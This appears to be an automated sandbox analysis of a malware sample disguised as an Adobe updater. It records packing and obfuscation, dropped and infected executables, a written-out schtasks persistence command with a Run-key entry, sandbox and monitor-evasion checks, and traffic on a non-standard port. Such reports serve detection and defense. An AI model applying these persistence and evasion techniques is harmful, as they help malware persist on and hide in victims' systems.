Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: AdobeUpdaterV131.exe Static file information: File size 2342912 > 1048576
Source: AdobeUpdaterV131.exe Static PE information: Raw size of czumqxku is bigger than: 0x100000 < 0x1a4a00
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Unpacked PE file: 0.2.AdobeUpdaterV131.exe.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Unpacked PE file: 1.2.xRp.exe.4e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 9.2.MPGPH131.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 10.2.MPGPH131.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 12.2.RageMP131.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 14.2.RageMP131.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;czumqxku:EW;oiivdxoz:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Unpacked PE file: 15.2.xRp.exe.e30000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: u
PE file contains sections with non-standard names
Source: AdobeUpdaterV131.exe Static PE information: section name:
Source: AdobeUpdaterV131.exe Static PE information: section name: .idata
Source: AdobeUpdaterV131.exe Static PE information: section name:
Source: AdobeUpdaterV131.exe Static PE information: section name: czumqxku
Source: AdobeUpdaterV131.exe Static PE information: section name: oiivdxoz
Source: AdobeUpdaterV131.exe Static PE information: section name: .taggant
Source: AdobeUpdaterV131.exe Static PE information: section name: u
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name: .idata
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name: czumqxku
Source: MPGPH131.exe.0.dr Static PE information: section name: oiivdxoz
Source: MPGPH131.exe.0.dr Static PE information: section name: .taggant
Source: MPGPH131.exe.0.dr Static PE information: section name: u
Source: xRp.exe.0.dr Static PE information: section name: .aspack
Source: xRp.exe.0.dr Static PE information: section name: .adata
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name: .idata
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name: czumqxku
Source: RageMP131.exe.0.dr Static PE information: section name: oiivdxoz
Source: RageMP131.exe.0.dr Static PE information: section name: .taggant
Source: RageMP131.exe.0.dr Static PE information: section name: u
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: u
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Code function: 0_2_006FC7B8 push ecx; ret 0_2_006FC7CB
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E1638 push dword ptr [004E3084h]; ret 1_2_004E170E
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E600A push ebp; ret 1_2_004E600D
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E2D9B push ecx; ret 1_2_004E2DAB
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 1_2_004E6014 push 004E14E1h; ret 1_2_004E6425
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 9_2_00B8C7B8 push ecx; ret 9_2_00B8C7CB
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 10_2_00B8C7B8 push ecx; ret 10_2_00B8C7CB
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_006CB4B0 push 00000000h; retf 12_2_006CB4B8
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 12_2_0069C7B8 push ecx; ret 12_2_0069C7CB
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_006CB4B0 push 00000000h; retf 14_2_006CB4B8
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 14_2_0069C7B8 push ecx; ret 14_2_0069C7CB
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E31638 push dword ptr [00E33084h]; ret 15_2_00E3170E
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E3600A push ebp; ret 15_2_00E3600D
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E36014 push 00E314E1h; ret 15_2_00E36425
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Code function: 15_2_00E32D9B push ecx; ret 15_2_00E32DAB
Source: AdobeUpdaterV131.exe Static PE information: section name: entropy: 7.980927554299119
Source: AdobeUpdaterV131.exe Static PE information: section name: czumqxku entropy: 7.951415630425814
Source: AdobeUpdaterV131.exe Static PE information: section name: u entropy: 6.933507194790652
Source: MPGPH131.exe.0.dr Static PE information: section name: entropy: 7.980927554299119
Source: MPGPH131.exe.0.dr Static PE information: section name: czumqxku entropy: 7.951415630425814
Source: MPGPH131.exe.0.dr Static PE information: section name: u entropy: 6.933507194790652
Source: xRp.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: RageMP131.exe.0.dr Static PE information: section name: entropy: 7.980927554299119
Source: RageMP131.exe.0.dr Static PE information: section name: czumqxku entropy: 7.951415630425814
Source: RageMP131.exe.0.dr Static PE information: section name: u entropy: 6.933507194790652
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ entropy: 6.934511024885519
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR entropy: 6.935286807883395
Source: SciTE.exe.1.dr Static PE information: section name: u entropy: 6.9346424707437535

Persistence and Installation Behavior
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\xRp.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File created: C:\Users\user\AppData\Local\Temp\xRp.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xRp.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 799
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
